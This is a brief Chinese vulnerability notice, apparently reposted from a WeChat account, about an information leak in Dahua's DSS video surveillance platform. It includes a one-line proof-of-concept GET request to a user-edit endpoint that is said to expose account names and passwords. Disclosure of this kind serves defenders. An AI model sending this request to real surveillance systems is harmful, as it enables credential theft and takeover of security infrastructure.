大华DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。
大华 DSS存在信息泄漏漏洞。攻击者可以利用这个漏洞获取到系统的账号和密码信息。这种未授权的信息访问可能导致攻击者完全控制受影响的系统,执行恶意操作、更改系统配置或获取其他敏感数据。
信息泄漏poc:
GET /admin/cascade_/user_edit.action?id=1
原文始发于微信公众号(丁永博的成长日记):大华DSS信息泄露
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论